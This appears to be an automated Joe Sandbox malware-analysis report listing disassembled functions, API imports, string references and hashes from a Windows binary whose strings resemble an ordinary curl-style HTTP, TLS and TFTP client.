Maximum file size exceeded, xrefs: 00007FF7F1DCAB4B
WWW-Authenticate:, xrefs: 00007FF7F1DCB00C
close, xrefs: 00007FF7F1DCAC5C, 00007FF7F1DCACDF
Negotiate: noauthpersist -> %d, header part: %s, xrefs: 00007FF7F1DCB0FB
HTTP/1.0 connection set to keep alive, xrefs: 00007FF7F1DCACD3
HTTP/1.1 proxy connection set close, xrefs: 00007FF7F1DCAC8E
localhost, xrefs: 00007FF7F1DCAF29
false, xrefs: 00007FF7F1DCB0E0
Content-Length:, xrefs: 00007FF7F1DCAADE
Illegal STS header skipped, xrefs: 00007FF7F1DCB211
Overflow Content-Length: value, xrefs: 00007FF7F1DCAB6E
keep-alive, xrefs: 00007FF7F1DCAC05, 00007FF7F1DCACA3
Content-Range:, xrefs: 00007FF7F1DCAE2C
Last-Modified:, xrefs: 00007FF7F1DCAFBB
Retry-After:, xrefs: 00007FF7F1DCADBF
Content-Encoding:, xrefs: 00007FF7F1DCAD81

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strcmp$_errno_time64
String ID: 127.0.0.1$Connection:$Content-Encoding:$Content-Length:$Content-Range:$Content-Type:$HTTP/1.0 connection set to keep alive$HTTP/1.0 proxy connection set to keep alive$HTTP/1.1 proxy connection set close$Illegal STS header skipped$Invalid Content-Length: value$Last-Modified:$Location:$Maximum file size exceeded$Negotiate: noauthpersist -> %d, header part: %s$Overflow Content-Length: value$Persistent-Auth:$Proxy-Connection:$Proxy-authenticate:$Retry-After:$Set-Cookie:$Strict-Transport-Security:$Transfer-Encoding:$WWW-Authenticate:$[::1]$close$false$keep-alive$localhost
API String ID: 1495474129-986724021
Opcode ID: b6d775b19366e5986245cc4d14d398c8371116df75f98b61ca64932071004797
Instruction ID: 986923f03d007a21d685e9b58be942b7531e91e368fc6dcc881137395c872a32
Opcode Fuzzy Hash: b6d775b19366e5986245cc4d14d398c8371116df75f98b61ca64932071004797
Instruction Fuzzy Hash: 76229F21B0D68255FB28FB21A5502B8A7B2AF45780FC44835DA7E076C6EFBCE505C7E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DAEB80 Relevance: 43.9, APIs: 10, Strings: 15, Instructions: 129stringCOMMON

Download Yara Rule

APIs

GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAEBAC
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAEBB4
__swprintf_l.LIBCMT ref: 00007FF7F1DAEFE0
__swprintf_l.LIBCMT ref: 00007FF7F1DAF021
__swprintf_l.LIBCMT ref: 00007FF7F1DAF060
strncpy.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DAF06F
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF07C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DAF087
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF090
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7F1DAF09C

Strings

SEC_I_SIGNATURE_NEEDED, xrefs: 00007FF7F1DAEFEA
SEC_I_RENEGOTIATE, xrefs: 00007FF7F1DAEFFC
Unknown error, xrefs: 00007FF7F1DAEFC2
SEC_I_LOCAL_LOGON, xrefs: 00007FF7F1DAEF6D
CRYPT_E_REVOKED, xrefs: 00007FF7F1DAEF39
SEC_I_COMPLETE_AND_CONTINUE, xrefs: 00007FF7F1DAEF79
SEC_I_CONTEXT_EXPIRED, xrefs: 00007FF7F1DAEFA0
%s - %s, xrefs: 00007FF7F1DAF059
%s (0x%08X), xrefs: 00007FF7F1DAF00C
SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log., xrefs: 00007FF7F1DAEFD6
SEC_I_CONTINUE_NEEDED, xrefs: 00007FF7F1DAEF8E
No error, xrefs: 00007FF7F1DAEF97
SEC_I_NO_LSA_CONTEXT, xrefs: 00007FF7F1DAEFF3
SEC_I_COMPLETE_NEEDED, xrefs: 00007FF7F1DAEF85
SEC_I_INCOMPLETE_CREDENTIALS, xrefs: 00007FF7F1DAF005

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: ErrorLast__swprintf_l_errno$strncpy
String ID: %s (0x%08X)$%s - %s$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_COMPLETE_AND_CONTINUE$SEC_I_COMPLETE_NEEDED$SEC_I_CONTEXT_EXPIRED$SEC_I_CONTINUE_NEEDED$SEC_I_INCOMPLETE_CREDENTIALS$SEC_I_LOCAL_LOGON$SEC_I_NO_LSA_CONTEXT$SEC_I_RENEGOTIATE$SEC_I_SIGNATURE_NEEDED$Unknown error
API String ID: 3653662010-131313631
Opcode ID: 9ef97734a369c9a12d841699bddcdcdf3d3b1b9dc4d8d4440ba5245ec52dcd0e
Instruction ID: 47e9cfc13d3413ae0c56f619bc673d3f1d39109f3e68368c72a517d2d080b253
Opcode Fuzzy Hash: 9ef97734a369c9a12d841699bddcdcdf3d3b1b9dc4d8d4440ba5245ec52dcd0e
Instruction Fuzzy Hash: B7516C2290C65286E768FB24A4046B8E374EF84781FC54036D5AE427D6CFFCE945D3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE88C0 Relevance: 40.6, APIs: 1, Strings: 22, Instructions: 383COMMON

Download Yara Rule

Strings

Issuer: %s, xrefs: 00007FF7F1DE89CC
-----BEGIN CERTIFICATE-----, xrefs: 00007FF7F1DE8D91
Expire Date: %s, xrefs: 00007FF7F1DE8BE4
Issuer, xrefs: 00007FF7F1DE89B2
Cert, xrefs: 00007FF7F1DE8E54
Signature Algorithm, xrefs: 00007FF7F1DE8B06
Serial Number: %s, xrefs: 00007FF7F1DE8AB5
Expire Date, xrefs: 00007FF7F1DE8BCA
%lx, xrefs: 00007FF7F1DE8A1E
Signature Algorithm: %s, xrefs: 00007FF7F1DE8B20
Public Key Algorithm, xrefs: 00007FF7F1DE8C3B
Signature, xrefs: 00007FF7F1DE8CC5
Public Key Algorithm: %s, xrefs: 00007FF7F1DE8C59
-----END CERTIFICATE-----, xrefs: 00007FF7F1DE8E02
Start Date, xrefs: 00007FF7F1DE8B68
Subject, xrefs: 00007FF7F1DE894D
Version: %lu (0x%lx), xrefs: 00007FF7F1DE8A6B
%2d Subject: %s, xrefs: 00007FF7F1DE896F
Version, xrefs: 00007FF7F1DE8A39
Signature: %s, xrefs: 00007FF7F1DE8CDF
Start Date: %s, xrefs: 00007FF7F1DE8B82
Serial Number, xrefs: 00007FF7F1DE8A9B

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID:
String ID: Expire Date: %s$ Issuer: %s$ Public Key Algorithm: %s$ Serial Number: %s$ Signature Algorithm: %s$ Signature: %s$ Start Date: %s$ Version: %lu (0x%lx)$%2d Subject: %s$%lx$-----BEGIN CERTIFICATE-----$-----END CERTIFICATE-----$Cert$Expire Date$Issuer$Public Key Algorithm$Serial Number$Signature$Signature Algorithm$Start Date$Subject$Version
API String ID: 0-2896079655
Opcode ID: 0f2055358cee03638fd404180435ac1685d668468cdddf8e577dba41469b2e77
Instruction ID: 06b7e7365d7f5dfd08c09d7a923ea56a3567d2951bb76fc4040341e629d8a585
Opcode Fuzzy Hash: 0f2055358cee03638fd404180435ac1685d668468cdddf8e577dba41469b2e77
Instruction Fuzzy Hash: D9F19E51E08B8355EB19FB2A94902B9A7A1AF59B86FC08031CD2E173D5DFBDE501C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE84CC Relevance: 35.2, APIs: 2, Strings: 18, Instructions: 228COMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DE8552
__swprintf_l.LIBCMT ref: 00007FF7F1DE864E

Strings

RSA Public Key (%lu bits), xrefs: 00007FF7F1DE8623
dsa(q), xrefs: 00007FF7F1DE8729
%lu, xrefs: 00007FF7F1DE8542, 00007FF7F1DE863E
dh(pub_key), xrefs: 00007FF7F1DE8821
dhpublicnumber, xrefs: 00007FF7F1DE87AC
RSA Public Key, xrefs: 00007FF7F1DE8659
ecPublicKey, xrefs: 00007FF7F1DE84F8, 00007FF7F1DE8577
dh(g), xrefs: 00007FF7F1DE880A
dsa, xrefs: 00007FF7F1DE86B6
ECC Public Key (%lu bits), xrefs: 00007FF7F1DE8527
rsa(n), xrefs: 00007FF7F1DE8676
dsa(g), xrefs: 00007FF7F1DE875B
rsaEncryption, xrefs: 00007FF7F1DE85AA
dsa(pub_key), xrefs: 00007FF7F1DE876E
rsa(e), xrefs: 00007FF7F1DE86AA
dh(p), xrefs: 00007FF7F1DE87DB
dsa(p), xrefs: 00007FF7F1DE86F0
ECC Public Key, xrefs: 00007FF7F1DE855D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l
String ID: ECC Public Key (%lu bits)$ RSA Public Key (%lu bits)$%lu$ECC Public Key$RSA Public Key$dh(g)$dh(p)$dh(pub_key)$dhpublicnumber$dsa$dsa(g)$dsa(p)$dsa(pub_key)$dsa(q)$ecPublicKey$rsa(e)$rsa(n)$rsaEncryption
API String ID: 1488884202-625760584
Opcode ID: ebfa71fa7c7e718fc8c77f87c6f19b6dd2cf363493f9df9788ff38d80edcb3b7
Instruction ID: 123d76a4f22259a2355e9fb1c2f35ef85bb4fe351333a417fb64e1a677c45bbe
Opcode Fuzzy Hash: ebfa71fa7c7e718fc8c77f87c6f19b6dd2cf363493f9df9788ff38d80edcb3b7
Instruction Fuzzy Hash: 25914B56A08A4394FB18FB62A4106F993B1AF45786FC48036DD2E536C9DFBCE506C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1D92C1C Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 131stringCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D92C49
malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92C63
strtok.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D92C85
strtok.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1D92CA4
__swprintf_l.LIBCMT ref: 00007FF7F1D92D28
_mkdir.API-MS-WIN-CRT-FILESYSTEM-L1-1-0 ref: 00007FF7F1D92D30
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D92D3A
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D92D45
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1D92D5B
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92DC4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1D92DCD

Strings

You don't have permission to create %s., xrefs: 00007FF7F1D92DAA
Cannot create directory %s because you exceeded your quota., xrefs: 00007FF7F1D92D82
No space left on the file system that will contain the directory %s., xrefs: 00007FF7F1D92DA1
The directory name %s is too long., xrefs: 00007FF7F1D92D8F
Error creating directory %s., xrefs: 00007FF7F1D92D7B
%s resides on a read-only file system., xrefs: 00007FF7F1D92D98
%s%s, xrefs: 00007FF7F1D92D21

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _errno$freestrtok$__swprintf_l_mkdir_strdupmalloc
String ID: %s resides on a read-only file system.$%s%s$Cannot create directory %s because you exceeded your quota.$Error creating directory %s.$No space left on the file system that will contain the directory %s.$The directory name %s is too long.$You don't have permission to create %s.
API String ID: 3627321920-1086585624
Opcode ID: 6eff02cbc8d66afcaa98fc4a1725345a58611d285cda82159f459e3338dc17c6
Instruction ID: bbaf1ced665e14a73ec8242b99b3641b1b9af0d73aea4e0c8d4a6acd195e1888
Opcode Fuzzy Hash: 6eff02cbc8d66afcaa98fc4a1725345a58611d285cda82159f459e3338dc17c6
Instruction Fuzzy Hash: 75519D20A0964285FB19BB59A850078A2B0AF45BA1FD48639C93D036E9DFFCE545C3E1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DDC9AC Relevance: 31.6, APIs: 10, Strings: 8, Instructions: 115COMMON

Download Yara Rule

APIs

_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DDC9D5
_mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DDC9FA
_mbsnbcmp.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DDCA1C
_mbschr.API-MS-WIN-CRT-MULTIBYTE-L1-1-0 ref: 00007FF7F1DDCAF5

Strings

CurrentService, xrefs: 00007FF7F1DDCA34
Users, xrefs: 00007FF7F1DDCA75
CurrentUser, xrefs: 00007FF7F1DDC9EA
Services, xrefs: 00007FF7F1DDCA56
CurrentUserGroupPolicy, xrefs: 00007FF7F1DDCA94
LocalMachine, xrefs: 00007FF7F1DDCA12
LocalMachineEnterprise, xrefs: 00007FF7F1DDCAD2
LocalMachineGroupPolicy, xrefs: 00007FF7F1DDCAB3

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _mbschr_mbsnbcmp
String ID: CurrentService$CurrentUser$CurrentUserGroupPolicy$LocalMachine$LocalMachineEnterprise$LocalMachineGroupPolicy$Services$Users
API String ID: 866314863-3209074899
Opcode ID: dcb420e6af7ed672b1d66cf765ca847a72a8d3dc008a2866f8cb8f78b5c8db5a
Instruction ID: b3e2d2471553936425895092a5d2fbd8ccadcfbbbc9bb04f5d4785cc212b19e2
Opcode Fuzzy Hash: dcb420e6af7ed672b1d66cf765ca847a72a8d3dc008a2866f8cb8f78b5c8db5a
Instruction Fuzzy Hash: 15414C61A0C74285FB15AF51E80037AB7A5AF45BC9F809135CD6D866D8EFFCE042D3A2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA19A0 Relevance: 30.2, APIs: 6, Strings: 14, Instructions: 229COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA1B93
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA1BD9
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA1C20
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA1C68

Part of subcall function 00007FF7F1DA19A0: free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA1CF1

Part of subcall function 00007FF7F1DA13AC: malloc.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00007FF7F1DA1406

Strings

curl_mime_encoder(part%d, "%s");, xrefs: 00007FF7F1DA1BB5
curl_mime_filename(part%d, NULL);, xrefs: 00007FF7F1DA1AD2
(curl_seek_callback) fseek, NULL, stdin);, xrefs: 00007FF7F1DA1A6E
slist%d = NULL;, xrefs: 00007FF7F1DA1CDD
curl_mime_headers(part%d, slist%d, 1);, xrefs: 00007FF7F1DA1CC0
curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \, xrefs: 00007FF7F1DA1A58
curl_mime_subparts(part%d, mime%d);, xrefs: 00007FF7F1DA1B52
curl_mime_filedata(part%d, "%s");, xrefs: 00007FF7F1DA1AA4
curl_mime_type(part%d, "%s");, xrefs: 00007FF7F1DA1C8A
part%d = curl_mime_addpart(mime%d);, xrefs: 00007FF7F1DA19E6
curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);, xrefs: 00007FF7F1DA1B15
mime%d = NULL;, xrefs: 00007FF7F1DA1B70
curl_mime_name(part%d, "%s");, xrefs: 00007FF7F1DA1C42
curl_mime_filename(part%d, "%s");, xrefs: 00007FF7F1DA1BFA

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: free$malloc
String ID: (curl_seek_callback) fseek, NULL, stdin);$curl_mime_data(part%d, "%s", CURL_ZERO_TERMINATED);$curl_mime_data_cb(part%d, -1, (curl_read_callback) fread, \$curl_mime_encoder(part%d, "%s");$curl_mime_filedata(part%d, "%s");$curl_mime_filename(part%d, "%s");$curl_mime_filename(part%d, NULL);$curl_mime_headers(part%d, slist%d, 1);$curl_mime_name(part%d, "%s");$curl_mime_subparts(part%d, mime%d);$curl_mime_type(part%d, "%s");$mime%d = NULL;$part%d = curl_mime_addpart(mime%d);$slist%d = NULL;
API String ID: 2190258309-2644548734
Opcode ID: 7d02b751a735bf8e5157fd66c9156fad4350745057d9674ba27a8b98467552ab
Instruction ID: 7c1448d27ea77a05cc09178aad1e138a52a43224cbab166e54ce832ba7c2574f
Opcode Fuzzy Hash: 7d02b751a735bf8e5157fd66c9156fad4350745057d9674ba27a8b98467552ab
Instruction Fuzzy Hash: 76917C20B1860352EB25FB669450279A3A4BF457E0FC00635DD3E477E6EFECE50083A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DEA6C0 Relevance: 30.1, APIs: 10, Strings: 10, Instructions: 118stringCOMMON

Download Yara Rule

APIs

strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DEA727
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DEA777
strcmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DEA797

Strings

space, xrefs: 00007FF7F1DEA809
alnum, xrefs: 00007FF7F1DEA76C
xdigit, xrefs: 00007FF7F1DEA7AC
blank, xrefs: 00007FF7F1DEA826
alpha, xrefs: 00007FF7F1DEA78C
lower, xrefs: 00007FF7F1DEA860
digit, xrefs: 00007FF7F1DEA719
upper, xrefs: 00007FF7F1DEA843
graph, xrefs: 00007FF7F1DEA7EC
print, xrefs: 00007FF7F1DEA7CC

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: strcmp
String ID: alnum$alpha$blank$digit$graph$lower$print$space$upper$xdigit
API String ID: 1004003707-2602438971
Opcode ID: e5b9489c4a7d59454e74786cae9f9c2fbde0a171d3e207f34751b12bbbc6c6d4
Instruction ID: 151cad7ec0245112ba80f207c22b28f71543fa71954466829b3a1eca97bdbf39
Opcode Fuzzy Hash: e5b9489c4a7d59454e74786cae9f9c2fbde0a171d3e207f34751b12bbbc6c6d4
Instruction Fuzzy Hash: E7515B21A0CA8784FB1CBB20C4852F8A7B59F5574AFC48031D96E461C5EFEDE586C3E2

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DA2310 Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 279stringCOMMON

Download Yara Rule

APIs

_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA23AB
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DA23BF
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA23C8
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,?,00000000,00000000,?,00000000,?,00007FF7F1DA2979), ref: 00007FF7F1DA2506
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DA251B
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA2524
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA2587
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DA259C
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA25A5
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA25BC
strtoul.API-MS-WIN-CRT-CONVERT-L1-1-0 ref: 00007FF7F1DA25D1
_errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FF7F1DA25DA

Part of subcall function 00007FF7F1D93E4C: __stdio_common_vsscanf.API-MS-WIN-CRT-STDIO-L1-1-0 ref: 00007FF7F1D93E89

Strings

bad range, xrefs: 00007FF7F1DA2431
%c-%c%c, xrefs: 00007FF7F1DA238F
range overflow, xrefs: 00007FF7F1DA24A2, 00007FF7F1DA2692
bad range specification, xrefs: 00007FF7F1DA26AF

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: _errno$strtoul$__stdio_common_vsscanf
String ID: %c-%c%c$bad range$bad range specification$range overflow
API String ID: 3842623485-566611384
Opcode ID: 6b9b44a0b3eab79b6cbb08dd0d0fc17d2b6d791b45ac79dfc8682ee1c2e2b9ca
Instruction ID: 9c79089a9cbd42a81a1fc0d176fa6ec56a6a25ed0df57b8e9e4e8f0799d03a40
Opcode Fuzzy Hash: 6b9b44a0b3eab79b6cbb08dd0d0fc17d2b6d791b45ac79dfc8682ee1c2e2b9ca
Instruction Fuzzy Hash: 10C1E032A096868AF718EF269854178B7B1FB45744FC58039CA6E433C2CFBCE805E760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DCF3C4 Relevance: 28.3, APIs: 6, Strings: 10, Instructions: 267networkCOMMON

Download Yara Rule

APIs

__swprintf_l.LIBCMT ref: 00007FF7F1DCF5DA
__swprintf_l.LIBCMT ref: 00007FF7F1DCF63B
__swprintf_l.LIBCMT ref: 00007FF7F1DCF6A8
__swprintf_l.LIBCMT ref: 00007FF7F1DCF70A
sendto.WS2_32 ref: 00007FF7F1DCF795
WSAGetLastError.WS2_32 ref: 00007FF7F1DCF7A3

Strings

%I64d, xrefs: 00007FF7F1DCF62C
tftp_send_first: internal error, xrefs: 00007FF7F1DCF43B
blksize, xrefs: 00007FF7F1DCF6B6
octet, xrefs: 00007FF7F1DCF3F8
netascii, xrefs: 00007FF7F1DCF402
%s%c%s%c, xrefs: 00007FF7F1DCF5BD
TFTP buffer too small for options, xrefs: 00007FF7F1DCF802
tsize, xrefs: 00007FF7F1DCF655
timeout, xrefs: 00007FF7F1DCF71C
TFTP file name too long, xrefs: 00007FF7F1DCF58D

Memory Dump Source

Source File: 00000008.00000002.1415442142.00007FF7F1D91000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7F1D90000, based on PE: true

Associated: 00000008.00000002.1415422898.00007FF7F1D90000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415478056.00007FF7F1DEE000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415528640.00007FF7F1E0F000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.1415543727.00007FF7F1E10000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_7ff7f1d90000_GSlLzFnTov.jbxd

Similarity

API ID: __swprintf_l$ErrorLastsendto
String ID: %I64d$%s%c%s%c$TFTP buffer too small for options$TFTP file name too long$blksize$netascii$octet$tftp_send_first: internal error$timeout$tsize
API String ID: 1110826907-119092532
Opcode ID: 924714a4dbd8d2f9a79742bf5bf45ff3e37ff149f52cb34c798acb0c79d0ee81
Instruction ID: b0070d12934a7e8a48f6f5402ecadca3b5a348c39e3bd7a42a52665c87356f04
Opcode Fuzzy Hash: 924714a4dbd8d2f9a79742bf5bf45ff3e37ff149f52cb34c798acb0c79d0ee81
Instruction Fuzzy Hash: 95C1B472A08A8682EB18EF25D5402F9A370FB45798F840532DA6D4B7D5CFBCE405C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7F1DE9124 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 143fileCOMMON

Download Yara Rule

APIs

_strdup.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FF7F1DE915F
